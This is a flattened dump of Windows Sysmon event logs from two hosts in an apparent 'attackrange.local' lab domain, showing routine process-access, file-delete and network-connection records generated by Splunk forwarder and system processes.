08:00:36.511{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083227Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.511{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083226Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.511{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083225Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.511{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083224Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.511{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B4A4-615A-8D01-00000000FD01}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083223Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.511{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B4A4-615A-8D01-00000000FD01}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083222Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:36.512{2FDD8D40-B4A4-615A-8D01-00000000FD01}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000106815Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:37.629{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=860511D1FAA5E714B242B6AA26BA9ED3,SHA256=F0FB57C2E08AAEB5897021B7897F844319E142B434C8958D1F1E8969FAEA11F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083238Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:37.886{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F83D36E848ABE6EB5CF0B80C6E2F2D9C,SHA256=715BE6696572332F15DCC3D4C8809393DEB5276FB8295419C1FC7408E4D995F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106814Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:37.030{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-033MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106816Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:38.679{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=774718681281B35C01C96787DDC13D4D,SHA256=21490BDE783EA0CBD44FB8B513174636493FC2723DD9F8570A3BDC0B275665C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083240Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:38.917{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2863CAEF84743C5B83FA28A2557EC3A3,SHA256=B7F2881A973D7C383E49302FD4C13E314183350D22D3F873B390469EAE3C9705,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083239Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:35.767{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50147-false10.0.1.12-8000- 23542300x800000000000000083241Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:39.980{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BAEC05357CC17774F791D1ADF02E071,SHA256=1C06982C88BD56083A6C69B00A665AE95F4473F17E9C78670D73375E1CD56C03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106817Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:39.698{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C612162C14B64463AA0A061B430BDAB,SHA256=E784BFB32E95B75245605F04F013CA1E95DEFD77AC676BB6BD5AC152E374B5D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106819Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:40.714{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00D899547E6896B56D147888F5783E2E,SHA256=4AE2CC1F6D0888A1B827F2885DDA3EF946AD5106BDDB78521832EB9E1BE9E4DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106818Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:39.436{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51862-false10.0.1.12-8000- 23542300x8000000000000000106820Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:41.729{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AE953170F2EAD63A8B4EE12A9193FEC,SHA256=5A885E31E96B5D3C3C61B201527F1B1C762A589FBE44AFBCF47B22338E238756,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083242Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:41.073{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD95A1A715F7E4F8A0306D98B9D9AE55,SHA256=A362DC0A9CC787612DD6920F731813CBA3407924CD3F7154FD2F6687CC47D8D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106828Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:42.828{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106827Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:42.828{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106826Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:42.828{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106825Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:42.828{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106824Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:42.828{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106823Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:42.828{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106822Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:42.828{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106821Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:42.744{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC098A625A456BBF8F246A5B067F9AB7,SHA256=51271FA99C30902ABBD43444A1124FF6826F11A980EEFA283211A9498979FB5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083243Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:42.073{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C16993716C58F0BA3FD84A9F1DEA60E,SHA256=DDB126D68A4A687C72704386CA59AE4A749D92ADA1201E491BACE99CB2FC3264,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106829Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:43.744{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A318791DD841B260B4064AB4E02527E,SHA256=90923456AA5DB13044BCB5C4CDD005453DDD7FBF9B4C28089506F4FCCE40AFEE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083245Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:41.597{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50148-false10.0.1.12-8000- 23542300x800000000000000083244Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:43.214{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F09499529A314A77ED325D2DDC592DF,SHA256=FE554B76A25DCC9CD2AFEEED8DE6F8D8A7FB5360A4592482F782C7F81B073C9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106830Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:44.759{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9C3A489E758240B90EB188DDF42C97D,SHA256=7186FFB341007F0C658BB92FC6B39CC1A427F66D35459B97813C64ADE26A119D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083246Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:44.214{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=262EEAFEAAF2DA39D1A8C4CDFABD9C89,SHA256=E7565CFE9E61480A8EA49E3DB7DE2E0D830D4DFA599C6761B4BEB2CCA1540E22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106831Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:45.777{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24901E47C9C2D11F62BC1841DF6A6530,SHA256=B9D2DA11BE0948E6253E88AA1A5DA151149A91BFA2FCBAD166ED32647BD8632C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083247Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:45.214{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F91CE62C95ADC2F85E4D6283F9C7C097,SHA256=DE27A0D9F8DE97961D57DFE8574C8529568124C6D4AD3385460D1E422AFDF0AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106833Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:46.795{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50EFEF1EFABD96EDDD22B0550BB3052B,SHA256=427EA93A11875AB65622C9DD52FB0612383096D84CE76EC06559CF3091EA7F2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083248Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:46.230{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F90BC535B35CC88ECFF46A645B2E9FD6,SHA256=F5D665C20E79DC695B3669FFA8C86A31EADEF19CE7A4B463381847CDC7275532,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106832Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:45.453{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51863-false10.0.1.12-8000- 23542300x8000000000000000106834Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:47.810{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56F57AA60C8D44D767028A7D8EABE6A7,SHA256=8860DB4FB71647896FE206193ACDB4A80353202FA814BD566A80BE066E8B2A7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083249Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:47.230{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=079ED6B7936E14FCDE126E0DFD5863B4,SHA256=722B2F375020A57ADFFDA3A56343757601A6E90D887209525C9D54CBDE0CC863,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106835Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:48.826{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3F0CEB589B946087DD5E7DEE399DBC2,SHA256=6EF62480C80F67DD28E32EEC3F26BC6BE5944065FD9991DBE8C6B8CC362BA3F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083251Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:46.691{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50149-false10.0.1.12-8000- 23542300x800000000000000083250Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:48.230{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 